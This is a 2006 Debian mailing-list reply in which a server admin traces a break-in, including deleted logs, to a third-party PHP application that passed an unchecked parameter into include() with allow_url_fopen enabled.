[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: possible server compromitation

Jon Dowland píše v Po 21. 08. 2006 v 19:05 +0100:
> On Mon, Aug 21, 2006 at 06:44:00PM +0200, David Siroky
> wrote:
> > Attackers deleted all access.log and error.log files
> > (which I had among the web files)
> 
> I assume by "among the web files" you mean you'd adjusted
> permissions on the logging directory so the apache user
> could write to them: by default, with apache2/debian, the
> www-data user cannot write to /var/log/apache2, and tampered
> logs would indicate a root-level exploit.
> 
> > I know that there is a security issue in mod_rewrite but I
> > don't use it.  Maybe PHP is unsafe. It is a mystery to me.
> 
> If you are correct and no root-level permissions were
> obtained, it is quite likely to be a badly written web
> application, rather than a vulnerability in apache2 or php
> itself.
> 

I finally found the hole. It was a badly written application
(fortunately not by me :-). The server has PHP directive
"allow_url_fopen on" and the application was passing one parameter
directly into include(...) without checking. The parameter was used to
include an enemy script.

Not I can sleep again :-)
Reply to: